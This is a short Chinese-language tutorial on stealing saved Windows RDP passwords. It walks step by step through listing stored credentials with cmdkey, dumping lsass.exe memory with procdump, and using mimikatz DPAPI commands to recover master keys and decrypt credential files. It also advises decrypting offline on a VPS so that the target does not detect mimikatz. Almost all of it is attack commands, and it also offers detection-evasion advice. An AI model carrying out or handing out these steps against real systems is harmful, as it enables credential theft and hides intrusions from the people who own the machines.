Windows RDP凭证的抓取和密码破解测试的方法
破解原理
Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。
在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
凭证的查看
查看凭证命令
查看mstsc的连接记录
cmdkey /list
查找本地的Credentials
dir /a %userprofile%\appdata\local\microsoft\credentials*
在线破解
1、使用mimikatz获取该文件的MasterKey的guid
mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421
所以用于加密凭据文件FF22A1FDA68FD8515B52C534E8655421B的MasterKey的guid就是:{c271c658-e61b- 4023-95d2-dfbf18b0aa33},所以我们只要从内存中找到这个guid对应的MasterKey的值即可
2、找到内存中对应的MasterKey
mimikatz sekurlsa::dpapi
3、最后打开mimikatz通过MasterKey值去解密凭据文件
dpapi::cred /in:凭据文件路径 /masterky:masterkey值
mimikatz dpapi::cred
/in:C:\Users\Administrator\appdata\local\microsoft\credentials\FF22A1FDA68FD8515B52C534E8655421 /masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c
离线破解
由于我们不能保证我们的mimikatz是免杀状态,为了避免被对方发现,我们可以离线解密从而达到获取密码的目的其实很简单,就是把目标的文件和内存下载回来,在vps或本机上进行mimikatz解密即可。
1、下载目标内存
procdump.exe ‐accepteula ‐ma lsass.exe lsass1.dump 导出lsass
2、下载目标的Credentials文件
3、用mimikatz载入dump回来的内存
Sekurlsa::minidump lsass1.dump
4、获取Credentials的GUID
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
5、获取内存中所有的MasterKey
sekurlsa::dpapi
6、利用MasterKey解密
dpapi::cred /in:FF22A1FDA68FD8515B52C534E8655421
/masterkey:b3354c56cd35630d10aa7477c3d16e9b94587f1dc6f9d0c8fcb72a5e4a25c8aab8fa242194666c4cc4be9 485c31af555b01a49abbfbb8cc1c00d209da624f33c